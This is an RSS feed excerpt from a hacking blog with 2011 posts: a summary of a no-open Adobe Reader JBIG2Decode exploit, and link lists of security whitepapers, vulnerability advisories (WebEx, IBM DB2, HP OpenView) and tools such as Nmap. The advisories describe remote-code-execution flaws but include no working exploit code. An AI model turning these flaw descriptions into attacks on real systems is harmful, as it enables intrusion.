<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-7928312777523567518</atom:id><lastBuildDate>Wed, 06 Nov 2024 03:09:38 +0000</lastBuildDate><title>HACK INVERSE</title><description>ULT!M4TE W3BS!T3 FOR H4CK!NG</description><link>http://hackinverse.blogspot.com/</link><managingEditor>noreply@blogger.com (Hackinverse)</managingEditor><generator>Blogger</generator><openSearch:totalResults>98</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-851664312938197708</guid><pubDate>Tue, 01 Feb 2011 17:11:00 +0000</pubDate><atom:updated>2011-02-01T22:41:23.563+05:30</atom:updated><title>Adobe Reader &gt; MAY DOOM YOU</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbuf6BtFu75Rr0pWvvrsRX6VlkO9sgLACeltw2wPYpQ0oHoaRrhyD-YWLXu-WSgmJs8H2lMg9Wr-b2_lT0wKHE4i4g7jtfy6d-VoAiWo5bS4sv4_CEgxNYC2Kqvp5eL6emB5Nd7BbMFY0/s1600/images+%25282%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbuf6BtFu75Rr0pWvvrsRX6VlkO9sgLACeltw2wPYpQ0oHoaRrhyD-YWLXu-WSgmJs8H2lMg9Wr-b2_lT0wKHE4i4g7jtfy6d-VoAiWo5bS4sv4_CEgxNYC2Kqvp5eL6emB5Nd7BbMFY0/s1600/images+%25282%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;In the last period of time malware authors started focusing more and  more on exploiting Adobe Reader (and ultimately users computers) via  maliciously crafted documents. And vulnerabilities in Adobe Reader have been quite a few lately.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Adobe Reader oriented attack was also the malicious injection on my last hosting service…&lt;br /&gt;
&lt;span id=&quot;more-60&quot;&gt;&lt;/span&gt;&lt;br /&gt;
In the recent issue of (in)SECURE Magazine, namely &lt;a href=&quot;http://www.net-security.org/dl/insecure/INSECURE-Mag-21.pdf&quot;&gt;issue 21&lt;/a&gt;, there is an article named “Malicious PDF: Get owned without opening” by &lt;a href=&quot;http://twitter.com/didierstevens&quot;&gt;Didier Stevens&lt;/a&gt; which shown an exploit in an Adobe Reader filter which made possible successful exploitation without file opening.&lt;/span&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;When a PDF document is listed in a Windows Explorer  window, the PDF column handler shell extension will be called by Windows  Explorer when it needs the additional column info. The PDF column  handler will read the PDF document to extract the necessary info, like  the Title, Author, etc. (…) Under the right circumstances, a Windows  Explorer Shell Extension will read the PDF document to provide extra  information, and in doing so, it will execute the buggy code and trigger  the vulnerability&lt;/span&gt;&lt;br /&gt;
&lt;/blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Other ways how the exploit could be launched (from the explorer  window) where by: selecting the pdf (left click), hovering over it and  changing the folder view to “Thumbnail”.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;/u&gt;&amp;nbsp;All these previous exploitation scenarios required minimal user  interaction, but the author had another card in his pocket. The  JBIG2Decode vulnerability could be exploited by the Windows Indexing  Service alone, the only difference being that this way the exploit would  run with less privileges; namely with Local System ones…&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;There you have it, another reason to switch to a pdf reader alternative.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; a resourceful article about pdf exploitation can be found &lt;a href=&quot;http://carnal0wnage.attackresearch.com/node/362&quot;&gt;here&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2011/02/adobe-reader-may-doom-you.html</link><author>noreply@blogger.com (Hackinverse)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihbuf6BtFu75Rr0pWvvrsRX6VlkO9sgLACeltw2wPYpQ0oHoaRrhyD-YWLXu-WSgmJs8H2lMg9Wr-b2_lT0wKHE4i4g7jtfy6d-VoAiWo5bS4sv4_CEgxNYC2Kqvp5eL6emB5Nd7BbMFY0/s72-c/images+%25282%2529.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-3866422856108227940</guid><pubDate>Tue, 01 Feb 2011 16:54:00 +0000</pubDate><atom:updated>2011-02-01T23:11:31.526+05:30</atom:updated><title>Hack Tools/Exploits</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfk0f0IEDEYjoSHfzKRGd5qBW_ajL0MzrVC2Z_ra8R8UdAwdIQbwXmDyz66MabipwFqmNufe82AHhBhx7XRSV-rGDlmDSVdd56TcXaEQlxsjP-7Pdk-5p9PmaNMqm6syjCItBccBVL46ym/s1600/images+%25281%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfk0f0IEDEYjoSHfzKRGd5qBW_ajL0MzrVC2Z_ra8R8UdAwdIQbwXmDyz66MabipwFqmNufe82AHhBhx7XRSV-rGDlmDSVdd56TcXaEQlxsjP-7Pdk-5p9PmaNMqm6syjCItBccBVL46ym/s1600/images+%25281%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-weight: bold;&quot;&gt;Astalavista Tools and Utilities&lt;/span&gt;&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14157-passwords-are-dead-long-live-passwords/&quot; title=&quot;Following a brief history and definition of passwords, this paper will show three properties of passwords that render passwords risky or unsuitable for use.&quot;&gt;Passwords are DEAD! (Long live passwords?)&lt;/a&gt;&lt;/span&gt;  - Following a brief history and definition of passwords, this paper  will show three properties of passwords that render passwords risky or  unsuitable for use.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14156-a-concept-for-universal-identification/&quot; title=&quot;The goal of this paper is to provide a detailed look at a new perspective for a unified, secure and consolidated form of personal identification. The advanced yet inexpensive technology exists today to step up modern identification to the next level.&quot;&gt;A Concept for Universal Identification&lt;/a&gt;&lt;/span&gt;  - The goal of this paper is to provide a detailed look at a new  perspective for a unified, secure and consolidated form of personal  identification. The advanced yet inexpensive technology exists today to  step up modern identification to the next level.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14155-biometrics-and-user-authentication/&quot; title=&quot;The purpose of this paper will be to look at the use of biometrics technology to determine how secure it might be in authenticating users, and how the users job function or role would impact the authentication process or protocol. We will also examine personal issues of privacy in the methods used f&quot;&gt;Biometrics and User Authentication&lt;/a&gt;&lt;/span&gt;  - The purpose of this paper will be to look at the use of biometrics  technology to determine how secure it might be in authenticating users,  and how the users job function or role would impact the authentication  process or protocol. We will also examine personal issues of privacy in  the methods used for authentication; the cost of implementing a  biometrics authentication system; the efficiency of biometrics  authentication; and the potential for false positive or negative  recognition of individual users.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14154-authentication-and-authorization-the-big-picture-with-ieee-8021x/&quot; title=&quot;This paper explores how Auth-x brings authentication and authorization down to a port level, enabling true privilege-based management of network services.&quot;&gt;Authentication and Authorization: The Big Picture with IEEE 802.1X&lt;/a&gt;&lt;/span&gt;  - This paper explores how Auth-x brings authentication and  authorization down to a port level, enabling true privilege-based  management of network services.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14153-sslsmart-smart-ssl-cipher-enumeration/&quot; title=&quot;Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and applications.&quot;&gt;SSLSmart - Smart SSL Cipher Enumeration&lt;/a&gt;&lt;/span&gt; - Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and &lt;span style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;applications&lt;/span&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14152-microsoft-excel-spreadsheets-expose-user-pin-used-for-confidentialsecure-printing/&quot; title=&quot;Whitepaper called Microsoft Excel Spreadsheets Expose User PIN Used For Confidential/Secure Printing.&quot;&gt;Microsoft Excel Spreadsheets Expose User PIN Used For Confidential/Secure Printing&lt;/a&gt;&lt;/span&gt; - Whitepaper called Microsoft Excel Spreadsheets Expose User PIN Used For Confidential/Secure Printing.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14151-antivirus-firewall-evasion-techniques-evolution-of-download-deploy-shellcode/&quot; title=&quot;Whitepaper called Antivirus / Firewall Evasion Techniques : Evolution of Download Deploy Shellcode.&quot;&gt;Antivirus / Firewall Evasion Techniques : Evolution of Download Deploy Shellcode&lt;/a&gt;&lt;/span&gt; - Whitepaper called Antivirus / Firewall Evasion Techniques : Evolution of Download Deploy Shellcode.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14150-effectiveness-of-antivirus-in-detecting-web-application-backdoors/&quot; title=&quot;Whitepaper called Effectiveness of Antivirus in Detecting Web Application Backdoors.&quot;&gt;Effectiveness of Antivirus in Detecting Web Application Backdoors&lt;/a&gt;&lt;/span&gt; - Whitepaper called Effectiveness of Antivirus in Detecting Web Application Backdoors.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14149-netbios-share-scanner-03/&quot; title=&quot;This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.    Changes: IP mask and range support.&quot;&gt;Netbios Share Scanner 0.3&lt;/a&gt;&lt;/span&gt; - This Python script is a tool that can be used to check &lt;span style=&quot;color: blue; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;background-color: transparent; border-bottom-color: blue; border-bottom-style: solid; border-bottom-width: 1px; color: blue; position: static;&quot;&gt;windows&lt;/span&gt;&lt;/span&gt; workstations and servers if they have accessible shared resources.&lt;br /&gt;
Changes: IP mask and range support.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.astalavista.com/files/file/14148-gethttpstatus-scanning-script/&quot; title=&quot;GetHTTPStatus is a simple python script that scans a set of provided URLs and returns the status codes provided. It has the ability to use cookies if needed.&quot;&gt;GetHTTPStatus Scanning Script&lt;/a&gt;&lt;/span&gt;  - GetHTTPStatus is a simple python script that scans a set of provided  URLs and returns the status codes provided. It has the ability to use  cookies if needed.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;h3&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: small;&quot;&gt;Packetstorm Last 10 Files&lt;/span&gt;&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98038/CORE-2010-1001.txt&quot; title=&quot;Core Security Technologies Advisory - There are stack overflows on WebEx that can be exploited by sending maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When opened, these files trigger a reliably exploitable stack based buffer overflow. Code execution is trivially achieved on t&quot;&gt;Core Security Technologies Advisory 2010-1001&lt;/a&gt;&lt;/span&gt;  - Core Security Technologies Advisory - There are stack overflows on  WebEx that can be exploited by sending maliciously crafted .atp and .wrf  &lt;span style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;files&lt;/span&gt;&lt;/span&gt;  to a vulnerable WebEx user. When opened, these files trigger a reliably  exploitable stack based buffer overflow. Code execution is trivially  achieved on the .wrf case because WebEx Player allocates a function  pointer on the stack that is periodically used in what seems to be a  callback mechanism, and also because DEP and ASLR are not enabled. In  the .atp case an exception handler can be overwritten on the stack, and  most registers can be trivially overwritten.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98037/ZDI-11-037.txt&quot; title=&quot;Zero Day Initiative Advisory 11-037 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec IM Manager. Authentication is required to exploit this vulnerability in that a logged in user must be coerced into visiting a malicious link. The specifi&quot;&gt;Zero Day Initiative Advisory 11-037&lt;/a&gt;&lt;/span&gt;  - Zero Day Initiative Advisory 11-037 - This vulnerability allows  remote attackers to execute arbitrary code on vulnerable installations  of Symantec IM Manager. Authentication is required to exploit this  vulnerability in that a logged in user must be coerced into visiting a  malicious link. The specific flaw exists within the ScheduleTask method  exposed by the IMAdminSchedTask.asp page hosted on the web interface.  This function does not properly sanitize user input from a POST variable  before passing it to an eval call. An attacker can abuse this to inject  and execute arbitrary ASP under the context of the user visiting the  malicious link.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98036/SSLSmart_WhitePaper_V1.0.pdf&quot; title=&quot;Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and applications.&quot;&gt;SSLSmart - Smart SSL Cipher Enumeration&lt;/a&gt;&lt;/span&gt; - Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and applications.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98035/SSLSmart-Gem-Win-Installer.zip&quot; title=&quot;SSLSmart is an open source, highly flexible and interactive tool aimed at improving efficiency and reducing false positives during SSL testing. A number of tools allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is &quot;&gt;SSLSmart SSL Testing Tool 1.0&lt;/a&gt;&lt;/span&gt;  - SSLSmart is an open source, highly flexible and interactive tool  aimed at improving efficiency and reducing false positives during SSL  testing. A number of tools allow users to test for supported SSL ciphers  suites, but most only provide testers with a fixed set of cipher  suites. Further testing is performed by initiating only an SSL socket  connection with one cipher suite at a time, an inefficient approach that  leads to false positives and often does not provide a clear picture of  the true vulnerability of the &lt;span style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;server&lt;/span&gt;&lt;/span&gt;. SSLSmart is designed to combat these shortcomings.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98031/ZDI-11-036.txt&quot; title=&quot;Zero Day Initiative Advisory 11-036 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM DB2. Authentication is not required to exploit this vulnerability. The flaw exists within the db2dasrrm component which listens by default on TCP port 524. Wh&quot;&gt;Zero Day Initiative Advisory 11-036&lt;/a&gt;&lt;/span&gt;  - Zero Day Initiative Advisory 11-036 - This vulnerability allows  remote attackers to execute arbitrary code on vulnerable installations  of IBM DB2. Authentication is not required to exploit this  vulnerability. The flaw exists within the db2dasrrm component which  listens by default on TCP port 524. When allocating a buffer within  receiveDASMessage a user supplied length is used as a parameter to  malloc(). This buffer is later copied into without any bounds checking  and can be made to overflow. A remote attacker can exploit this  vulnerability to execute arbitrary code under the context of the das  user user.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98022/netbios-shares-scanner-0.3.zip&quot; title=&quot;This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.&quot;&gt;Netbios Share Scanner 0.3&lt;/a&gt;&lt;/span&gt;  - This Python script is a tool that can be used to check windows  workstations and servers if they have accessible shared resources.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98019/cmswebmanagerpro-xsrfexec.txt&quot; title=&quot;CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.&quot;&gt;CMS WebManager-Pro 7.4.3 Code Execution / Cross Site Request Forgery&lt;/a&gt;&lt;/span&gt; - CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98014/clamav-0.97rc.tar.gz&quot; title=&quot;Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a commandline scanner, and a tool for automatic updating via Internet. The programs are &quot;&gt;Clam AntiVirus Toolkit 0.97rc&lt;/a&gt;&lt;/span&gt;  - Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of  this software is the integration with mail servers (attachment  scanning). The package provides a flexible and scalable multi-threaded  daemon, a commandline scanner, and a tool for automatic updating via  Internet. The programs are based on a shared library distributed with  the Clam AntiVirus package, which you can use in your own &lt;span style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;software&lt;/span&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98013/ZDI-11-035.txt&quot; title=&quot;Zero Day Initiative Advisory 11-035 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM DB2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the db2dasrrm process responsible for handling queries to t&quot;&gt;Zero Day Initiative Advisory 11-035&lt;/a&gt;&lt;/span&gt;  - Zero Day Initiative Advisory 11-035 - This vulnerability allows  remote attackers to execute arbitrary code on vulnerable installations  of IBM DB2. Authentication is not required to exploit this  vulnerability. The specific flaw exists within the db2dasrrm process  responsible for handling queries to the com.ibm.db2.das.core.DasSysCmd  function. While processing a request, the username supplied is copied  into a fixed-length stack buffer. By providing a large enough string the  copy operation can overflow leading to remote code execution.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98012/ZDI-11-034.txt&quot; title=&quot;Zero Day Initiative Advisory 11-034 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Performance Insight Server. Authentication is not required to exploit this vulnerability. The specific vulnerability is due to a hidden a&quot;&gt;Zero Day Initiative Advisory 11-034&lt;/a&gt;&lt;/span&gt;  - Zero Day Initiative Advisory 11-034 - This vulnerability allows  remote attackers to execute arbitrary code on vulnerable installations  of Hewlett-Packard OpenView Performance Insight Server. Authentication  is not required to exploit this vulnerability. The specific  vulnerability is due to a hidden account present within the  com.trinagy.security.XMLUserManager Java class. Using this account a  malicious user can access the com.trinagy.servlet.HelpManagerServlet  class. This is defined within the piweb.jar file installed with  Performance Insight. This class exposes a doPost() method which an  attacker can use to upload malicious files to the server. Accessing  these files can then lead to arbitrary code execution under the context  of the SYSTEM user.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;h3&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: small;&quot;&gt;Packetstorm Tools&lt;/span&gt;&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98022/netbios-shares-scanner-0.3.zip&quot; title=&quot;This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.&quot;&gt;Netbios Share Scanner 0.3&lt;/a&gt;&lt;/span&gt;  - This Python script is a tool that can be used to check windows  workstations and servers if they have accessible shared resources.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98023/gethttpstatus.py.txt&quot; title=&quot;GetHTTPStatus is a simple python script that scans a set of provided URLs and returns the status codes provided. It has the ability to use cookies if needed.&quot;&gt;GetHTTPStatus Scanning Script&lt;/a&gt;&lt;/span&gt;  - GetHTTPStatus is a simple python script that scans a set of provided  URLs and returns the status codes provided. It has the ability to use  cookies if needed.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97991/nield-0.10.tar.gz&quot; title=&quot;Network Interface Events Logging Daemon is a tool that receives notifications from the kernel through the rtnetlink socket, and generates logs related to link state, neighbor cache(ARP,NDP), IP address(IPv4,IPv6), route, FIB rules.&quot;&gt;NIELD (Network Interface Events Logging Daemon) 0.10&lt;/a&gt;&lt;/span&gt;  - Network Interface Events Logging Daemon is a tool that receives  notifications from the kernel through the rtnetlink socket, and  generates logs related to link state, neighbor cache(ARP,NDP), IP  address(IPv4,IPv6), route, FIB rules.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97990/nmap-5.50.tgz&quot; title=&quot;Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). N&quot;&gt;Nmap Port Scanner 5.50&lt;/a&gt;&lt;/span&gt;  - Nmap is a utility for port scanning large networks, although it works  fine for single hosts. Sometimes you need speed, other times you may  need stealth. In some cases, bypassing firewalls may be required. Not to  mention the fact that you may want to scan different protocols (UDP,  TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN  (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp  proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments  (bypasses some packet filters), TCP ACK and Window scanning, UDP raw  ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping  scanning, Direct (non portmapper) RPC scanning, Remote OS Identification  by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also  supports a number of performance and reliability features such as  dynamic delay time calculations, packet timeout and retransmission,  parallel port scanning, detection of down hosts via parallel pings.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97963/packetfence-2.0.1.tar.gz&quot; title=&quot;PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration &quot;&gt;Packet Fence 2.0.1&lt;/a&gt;&lt;/span&gt;  - PacketFence is a network access control (NAC) system. It is actively  maintained and has been deployed in numerous large-scale institutions.  It can be used to effectively secure networks, from small to very large  heterogeneous networks. PacketFence provides NAC-oriented features such  as registration of new network &lt;span style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;&lt;span class=&quot;kLink&quot; style=&quot;color: blue; font-weight: inherit !important; position: static;&quot;&gt;devices&lt;/span&gt;&lt;/span&gt;,  detection of abnormal network activities including from remote snort  sensors, isolation of problematic devices, remediation through a captive  portal, and registration-based and scheduled vulnerability scans.&lt;/span&gt;&lt;/li&gt;
